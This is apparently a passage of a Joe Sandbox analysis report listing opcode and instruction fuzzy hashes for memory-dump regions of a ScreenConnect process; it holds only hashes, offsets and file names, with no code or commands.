                                                                  • Opcode ID: d1ea7d107804c7f5a289c8538a3798d271949f414a62775a9022d17ee506319a
                                                                  • Instruction ID: b8e8a1e562e34ccc6114d39a8b36a136d9cf3e4c418ca1b0a4f48de959828a51
                                                                  • Opcode Fuzzy Hash: d1ea7d107804c7f5a289c8538a3798d271949f414a62775a9022d17ee506319a
                                                                  • Instruction Fuzzy Hash: 3F315B26B0DA1A4BD7A0F7ACB4B21FAB7A0EF9633A7484377D24CD6153DC189C464385
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3457880698.00007FFD340BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340BA000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffd340ba000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5a3c208e63910b78ce5cac38066469b034ff53579532af18767439d18828900e
                                                                  • Instruction ID: bfd689e0f02af4405377d7dd2eb13b49d409117d90ed2875dc0504e577b68539
                                                                  • Opcode Fuzzy Hash: 5a3c208e63910b78ce5cac38066469b034ff53579532af18767439d18828900e
                                                                  • Instruction Fuzzy Hash: 67213B32B0DF1D8FEB699A5C69E91B937D2EF99351B0001BBD50CCB285DD28AC069380
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3466013811.00007FFD343C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffd343c0000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: cc498965b47348b459816234ba142d5e6acf0d34a4446c3bf11de5ad6193e07b
                                                                  • Instruction ID: 4251dfb0d015c4bc4d0afab147f0a2d4df48c7e604ef12306832b09abd165fce
                                                                  • Opcode Fuzzy Hash: cc498965b47348b459816234ba142d5e6acf0d34a4446c3bf11de5ad6193e07b
                                                                  • Instruction Fuzzy Hash: 1731C571B4DA864FD799EB28C8A46A577D1FF59314B0405BED45ED7292CE38BC01C780
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3466013811.00007FFD343C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffd343c0000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c8e53874f30c617e83bc5e08fbc475c64dc114f4b58ded635358c15ae0ae04f3
                                                                  • Instruction ID: f8cea44ec2a8f6cbe4dec826d323a078fd8b22508d504d0c98107bde33647de7
                                                                  • Opcode Fuzzy Hash: c8e53874f30c617e83bc5e08fbc475c64dc114f4b58ded635358c15ae0ae04f3
                                                                  • Instruction Fuzzy Hash: D9219071B5CA4A8FDB98EA28C4A0AB973D1FF58314B0405B9D49ED7292CE39BC01D780
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3457880698.00007FFD340BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340BA000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffd340ba000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 031de2a071655ccc9826a458204468f26e316c1f2a08292fb121ae4114724b5a
                                                                  • Instruction ID: 7dbeb511ad280a7e804994550ba188d2757aec55eed61e72108c73210a9b352a
                                                                  • Opcode Fuzzy Hash: 031de2a071655ccc9826a458204468f26e316c1f2a08292fb121ae4114724b5a
                                                                  • Instruction Fuzzy Hash: 39113632B1DA860FE795E768A8A25F2B7E4EF9632470842B7D00CC7592CC6CE9438355
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3457880698.00007FFD340BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340BA000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffd340ba000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 11c5f3cef576f403e6cc63e68a34c468e908d8cacbf1e7f4ea6f5e81bda17ef2
                                                                  • Instruction ID: 03f316d5803b6dc35f2cff926ade7cd34dde14f7db50046b554c6920a1bab7dc
                                                                  • Opcode Fuzzy Hash: 11c5f3cef576f403e6cc63e68a34c468e908d8cacbf1e7f4ea6f5e81bda17ef2
                                                                  • Instruction Fuzzy Hash: 08213A62B0DACA0FD799963844B92657BD1FF6A21071802FED45AC71D3DD5CEC029341
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3457880698.00007FFD340BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340BA000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffd340ba000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7cfa01c7166acdd6304a6ff3a902a0bc60d66689b3f6d90f9f6df153971e46ba
                                                                  • Instruction ID: 003ad3e47ee3e2580cc9d930164edb2b17a8b2f8fa18c0b71a0d22938a6c666f
                                                                  • Opcode Fuzzy Hash: 7cfa01c7166acdd6304a6ff3a902a0bc60d66689b3f6d90f9f6df153971e46ba
                                                                  • Instruction Fuzzy Hash: 1421F030A49A8E8FDB91EFA4C8246E97BF0EF4A300F4504BAE448D31E2CE7C5840DB50
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3466013811.00007FFD343C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffd343c0000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 82025263db00b58464ec5a3985ef4f9d4be7c9bb6e7bfd0298f3d21916a95a6d
                                                                  • Instruction ID: 7bcef6211fc5bf3c9b472e474d832a8ebff9d800bcc824bff5036652c40bcafa
                                                                  • Opcode Fuzzy Hash: 82025263db00b58464ec5a3985ef4f9d4be7c9bb6e7bfd0298f3d21916a95a6d
                                                                  • Instruction Fuzzy Hash: 4B11D6B2E8DA4D8FDFC1EB644DA50A87FE0EF5A304F4504AAD558C3192DB38A840C706
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3457880698.00007FFD340BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340BA000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffd340ba000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8a37e3339ddd7020e4d4fe9ba8e406b5910cbc69c332722048567e64a3723a57
                                                                  • Instruction ID: 6bd75800571703871662fcf80b779b9e409c0b7fe3ba2f269b25cbd337e2c8f6
                                                                  • Opcode Fuzzy Hash: 8a37e3339ddd7020e4d4fe9ba8e406b5910cbc69c332722048567e64a3723a57
                                                                  • Instruction Fuzzy Hash: D511102564EBC60FE79797388874661BFB0AF47210B1E00EBC498CB2E3CA499849D712
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3457880698.00007FFD340BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340BA000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffd340ba000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b2c88d1c10b18682f53fc9f6680e475e4ecb4d9223132e11b8670e127452810d
                                                                  • Instruction ID: a0d029aea151cd96c27ded91b6cebd9be06c5ccfc604129adc819d68a091c9a7
                                                                  • Opcode Fuzzy Hash: b2c88d1c10b18682f53fc9f6680e475e4ecb4d9223132e11b8670e127452810d
                                                                  • Instruction Fuzzy Hash: 1E012B62B1CD4A4BEB98E62C98646F9B7D0FF58304B00047AD50AE3286DD2CE8055780
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3466013811.00007FFD343C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffd343c0000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 36d20c07ebbb9a460ea9a04a86930cb07cf2fe96453e2296333b148831e33d22
                                                                  • Instruction ID: 9f5f45fac91ee97748280a1da64c493a5876722dad21bb389027b00d503883c5
                                                                  • Opcode Fuzzy Hash: 36d20c07ebbb9a460ea9a04a86930cb07cf2fe96453e2296333b148831e33d22
                                                                  • Instruction Fuzzy Hash: B8114971A0894A8FDF99EF18C0A5BA577E1FF69304B1441B8C45DDB296CE38EC45DB80
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3457880698.00007FFD340BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340BA000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffd340ba000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f60c018b31751e3de6d02a6857ace2ca114bf1f0814eebe2136cf0ab243d0e06
                                                                  • Instruction ID: d0503ad843a77d3c899e8390fb80c7b80c792f4375837d1e44decbcd7a19c8d8
                                                                  • Opcode Fuzzy Hash: f60c018b31751e3de6d02a6857ace2ca114bf1f0814eebe2136cf0ab243d0e06
                                                                  • Instruction Fuzzy Hash: F311E830B1891D8FDF94EB58D5A4AB9B3E1FF99305B510069D50ED72A1DE29AC00DB00
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3466013811.00007FFD343C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffd343c0000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 11c8f4220a0da7f4ba24c641ee5c822af8809daa52ba89ebaeb439efd5128c17
                                                                  • Instruction ID: bc0f0113e3a997fecb85c0dc72f65e3082c3e3949380056dc05048ecf9c999da
                                                                  • Opcode Fuzzy Hash: 11c8f4220a0da7f4ba24c641ee5c822af8809daa52ba89ebaeb439efd5128c17
                                                                  • Instruction Fuzzy Hash: E6115B71A0894A8FDFC9EF18C0A5BA577E1FF69304B0441A8C45DDB296CE38EC06CB80
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3466013811.00007FFD343C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffd343c0000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 06b01f3c900565da3c7028327d8c7b9f0b6bc3434f0f9c2df0d59a11b77619d0
                                                                  • Instruction ID: 6896b7bdb4e877150181068f6bc18007d2e108fad2c4527a5a0a2c3ead7b388d
                                                                  • Opcode Fuzzy Hash: 06b01f3c900565da3c7028327d8c7b9f0b6bc3434f0f9c2df0d59a11b77619d0
                                                                  • Instruction Fuzzy Hash: B511C225B4CB874AF7A5622885F03742BE1EF67301F1940BAC54AC71D2DC6DAC86A342
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3457880698.00007FFD340BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340BA000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffd340ba000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4acb9ca2d6fb77bd7f875a2bf345fd0ce6f3e3b659a00e0c253f0bb25fd40878
                                                                  • Instruction ID: 3618bf7b6f3291691c0e0cd5f2b8bed5cb5856acac5a7ea3f3d9166080bc0e92
                                                                  • Opcode Fuzzy Hash: 4acb9ca2d6fb77bd7f875a2bf345fd0ce6f3e3b659a00e0c253f0bb25fd40878
                                                                  • Instruction Fuzzy Hash: 08011B30A1495E8FEBA4EF68D8653A9B6E4FF59301F40087AE41DE32D1DE7869509B80
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3457880698.00007FFD340BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340BA000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffd340ba000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 914343233b162ed3e66a88e9e4c36fdef06ee300ecc39823a2f4c7805da62287
                                                                  • Instruction ID: 07466de43f3524282075ef91992f382b2846f21cc1de06594a211685e599c5d4
                                                                  • Opcode Fuzzy Hash: 914343233b162ed3e66a88e9e4c36fdef06ee300ecc39823a2f4c7805da62287
                                                                  • Instruction Fuzzy Hash: 50F02821B25D0A0FEBD4EA6CE494A76B3D1FFEC354744467AD00DD3255DC38E8428740
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3457880698.00007FFD340BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340BA000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffd340ba000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 90cb4011d81518770262b6e5ce6de1e11e91823d3df094e41736c79177f613c9
                                                                  • Instruction ID: 1b1817edc5afeb7e4d35b70c866bc1fb5631b7d05f4b6150dfd68faf382d2faa
                                                                  • Opcode Fuzzy Hash: 90cb4011d81518770262b6e5ce6de1e11e91823d3df094e41736c79177f613c9
                                                                  • Instruction Fuzzy Hash: E4F0F961B28D0E4FDBD9EB6C44955BA63E1FBA83147904176E40DC329ADD18D8428380
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3457880698.00007FFD340BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340BA000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffd340ba000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c040ebf9487328bc06dc069c25602d53a7affd1e17ed43b7e2c955496641cf9a
                                                                  • Instruction ID: 6d4ec4f941caaf5f22cd340ddf4ba6304e22596590466a70401b7a04f65b56ab
                                                                  • Opcode Fuzzy Hash: c040ebf9487328bc06dc069c25602d53a7affd1e17ed43b7e2c955496641cf9a
                                                                  • Instruction Fuzzy Hash: 2401AD61B15C098FE298E71C84A97B423D2FF99740F50027AD55ED36E2DE9AAC019700
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3457880698.00007FFD340BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340BA000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffd340ba000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: dbd8b66d2f761cd9b3fc1da076e2ec3f7ad7f909508c376ef1d82f45752efd65
                                                                  • Instruction ID: dafa591cd7451a901a4c5cc035e24e20fd5180088fa5968bae4404fd4bc7fef7
                                                                  • Opcode Fuzzy Hash: dbd8b66d2f761cd9b3fc1da076e2ec3f7ad7f909508c376ef1d82f45752efd65
                                                                  • Instruction Fuzzy Hash: BC01BC31A0CA8C8FCF41DF68C859AD97BF0EF5A314F0941AAE448D7162DB38E408CB81
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3457880698.00007FFD340BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340BA000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffd340ba000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0ccb4446f50bdd5eebd5806170ebeb302345dfd2b50efffda38c4ddee83650bc
                                                                  • Instruction ID: bf7e582b832adf9df70a9da44c0c097e8fc633f6e68e619dc987d84d66888da9
                                                                  • Opcode Fuzzy Hash: 0ccb4446f50bdd5eebd5806170ebeb302345dfd2b50efffda38c4ddee83650bc
                                                                  • Instruction Fuzzy Hash: 54018152B0EBCA4FE366567C48A60A47FE0DF9721470906FBC198CB1E3DC8C9845A356
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3457880698.00007FFD340BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340BA000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffd340ba000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 66b59dae648d09308df9cc519d413b542b8a218c2be7587541be508d1a68f56f
                                                                  • Instruction ID: d9189ea37fca27845cdd87d37416aff428ae00005e38e251e6968cfbd60bff44
                                                                  • Opcode Fuzzy Hash: 66b59dae648d09308df9cc519d413b542b8a218c2be7587541be508d1a68f56f
                                                                  • Instruction Fuzzy Hash: 0AF0903295D6898FCF42EFA898158EA7FB0FF56314B0A00D7D948D7073D328A844CB91
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3457880698.00007FFD340BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340BA000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffd340ba000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7c5e40fbe9e3df050392e9ae6b0ec55f64370a84fb69a1baf110ad6f3729d8eb
                                                                  • Instruction ID: b1fc2cb56d4e9e2bc7205e6d4172f0bde36a7914ff5653daf49bfcf15edf025a
                                                                  • Opcode Fuzzy Hash: 7c5e40fbe9e3df050392e9ae6b0ec55f64370a84fb69a1baf110ad6f3729d8eb
                                                                  • Instruction Fuzzy Hash: 64F02431A0C58C8FDB41DF68C859AEA7FF0FF66300B0441ABE508C7462CB289958CBD1
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3457880698.00007FFD340BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340BA000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffd340ba000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5f725e1a9e7aa9afc300aec901794dbcc6bbb742ad1d25fe68b4d0408df95762
                                                                  • Instruction ID: ec61fb9b2bfdeb475754e8f63d490aa3299a2aa688579c3a126267874be3e3cf
                                                                  • Opcode Fuzzy Hash: 5f725e1a9e7aa9afc300aec901794dbcc6bbb742ad1d25fe68b4d0408df95762
                                                                  • Instruction Fuzzy Hash: 0B01A235B49A5E4FDB88EB1484A53AC7BA1FF95300F8004A9D108D31C2CF7DAC84D742
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3457880698.00007FFD340BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340BA000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffd340ba000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9a5d73ca759f4335e0298ad51a26c7670fd40a7d8f9fa76c32ac6489c9964aa9
                                                                  • Instruction ID: 2ca3dd5ac5f32d90e9eb5509d5cb14fe31e81a2a846677738171e238020415fa
                                                                  • Opcode Fuzzy Hash: 9a5d73ca759f4335e0298ad51a26c7670fd40a7d8f9fa76c32ac6489c9964aa9
                                                                  • Instruction Fuzzy Hash: E8F09A30B298094FE794EA28D0A47B4B3E0EF99305B1405BEC54DC72E1CE6AA8828741
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3457880698.00007FFD340BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340BA000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffd340ba000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2d33855b0efd7844c18aee236de5d6c63f4255771b3462fa3be9b4acdae61a25
                                                                  • Instruction ID: a99e862dc275f8d1f6458b6a6ab182901f33e3f68e7984b0b58e263dcb9ca2d7
                                                                  • Opcode Fuzzy Hash: 2d33855b0efd7844c18aee236de5d6c63f4255771b3462fa3be9b4acdae61a25
                                                                  • Instruction Fuzzy Hash: 38F0C24899F2C2AED70367715CB04623FB88E43229B1C41EBD0D4CD4E3D54C085AE757
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3457880698.00007FFD340BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340BA000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffd340ba000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 474ee73cfe8201593f66891f9f410eee48d3b198ffa727c1167ed1a898499450
                                                                  • Instruction ID: 669523dc246e48570cd71c2ac1c0901b8f5f634750eaed2c081e505cb3616ad1
                                                                  • Opcode Fuzzy Hash: 474ee73cfe8201593f66891f9f410eee48d3b198ffa727c1167ed1a898499450
                                                                  • Instruction Fuzzy Hash: 4CF0B771A0490C9FCF44EF58C8499D97BF1FF6C319F0182A6E409E7260DB35A944CB81
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3457880698.00007FFD340BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340BA000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffd340ba000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d5e12688997bbfeabb154bbca9aabea9030cac1155824f2bbf4e333646e92ce1
                                                                  • Instruction ID: 18a89bf7515c6b21a3c07dc82f4028b4d4275545739794fa21ff1421400d8f15
                                                                  • Opcode Fuzzy Hash: d5e12688997bbfeabb154bbca9aabea9030cac1155824f2bbf4e333646e92ce1
                                                                  • Instruction Fuzzy Hash: 40E0E593F08C1E8BEBE8875C09A923747C0EBAA7907840372844CD72D2DC09AC026280
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3457880698.00007FFD340BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340BA000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffd340ba000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6b3c89c38b7f6be377bce12f993066b7125773e0c7483a09f0a34276f7040c19
                                                                  • Instruction ID: 25f5009e1f9ce1c9284a02965728d2546d2bc425a2c3d45d0d9027f0caac1cd5
                                                                  • Opcode Fuzzy Hash: 6b3c89c38b7f6be377bce12f993066b7125773e0c7483a09f0a34276f7040c19
                                                                  • Instruction Fuzzy Hash: EDF05E30608549CFCF84EF68C099EEA73A1FF68305F1041A9D80ACB255CF35E895CB40
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3466013811.00007FFD343C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffd343c0000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 17d7778c26f4a9f246c268a3fc6efc2875cf6d85d88ce95db37b50dbb95fca51
                                                                  • Instruction ID: 727fbfd40fdb874f9993fed36a3483fb17258e2555f0d3037ef26ac48b9de808
                                                                  • Opcode Fuzzy Hash: 17d7778c26f4a9f246c268a3fc6efc2875cf6d85d88ce95db37b50dbb95fca51
                                                                  • Instruction Fuzzy Hash: 9CE09B345496565FD7466B3588594F13BB0AF5621174940D7D884CA073E91C89C5C782
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3466013811.00007FFD343C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffd343c0000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5121be45881ece413d9236e1058dc0a90ff622f8dbf6cfcada2afd2f4301be82
                                                                  • Instruction ID: 46671cbc6b1f68100f5e13de3fac185672110d5027a6508ecefbeb51d9d936f4
                                                                  • Opcode Fuzzy Hash: 5121be45881ece413d9236e1058dc0a90ff622f8dbf6cfcada2afd2f4301be82
                                                                  • Instruction Fuzzy Hash: B3F06D354196599FCB42EB64D0548E77F70FF1A325B0501C7E049CB022E7219A96CBC2
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3457880698.00007FFD340BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340BA000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffd340ba000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3bcfbc9186a19d4b95ef7eb816fdb481fff314903e74fa2000d8e699ea72733d
                                                                  • Instruction ID: dc946d953ca6e68759591e1cfa689fb3304b42715a5c7140f4755d3e295c8ca2
                                                                  • Opcode Fuzzy Hash: 3bcfbc9186a19d4b95ef7eb816fdb481fff314903e74fa2000d8e699ea72733d
                                                                  • Instruction Fuzzy Hash: 37E04F317499098FDA94EB6CE464AA4B3E2EF9931135405B9D40DCB296CE6AEC92C740
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3457880698.00007FFD340BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340BA000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffd340ba000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 366a10bdc9324d95b53b240ed4321566a72f106659f925fc86ef440b34d82429
                                                                  • Instruction ID: 0cbb794ecb499a548b36deadf654cf51ce4b932eda7227a6e77e55f6bbfe78aa
                                                                  • Opcode Fuzzy Hash: 366a10bdc9324d95b53b240ed4321566a72f106659f925fc86ef440b34d82429
                                                                  • Instruction Fuzzy Hash: A7E0C262A1DD594BE7A8A63C548A1646AE0DF8A300B0408ABD41CD33A7DD6C884022C9
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3466013811.00007FFD343C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffd343c0000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6bedf2708003380bdbb795affbde9098ef0b8694250904af80a80bdef42f3103
                                                                  • Instruction ID: 31aae25a2f16ed623d77e907565b1304e61202c1019961ce0927e0d91b282f65
                                                                  • Opcode Fuzzy Hash: 6bedf2708003380bdbb795affbde9098ef0b8694250904af80a80bdef42f3103
                                                                  • Instruction Fuzzy Hash: 4DD0C202B8DD2A1BE5C1B61C34E11B801C2CBCA250F1800B3E10CC329ACC0CAC822345
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3466013811.00007FFD343C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffd343c0000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8af63f6cc5ffb63ede6779938f5fa1e71507ea3902ccab7c225d7162d6b32b2c
                                                                  • Instruction ID: 42cd767bd6d08777d19b04d3fc36597b3191a26eb116c7627cf744c9aa15fb48
                                                                  • Opcode Fuzzy Hash: 8af63f6cc5ffb63ede6779938f5fa1e71507ea3902ccab7c225d7162d6b32b2c
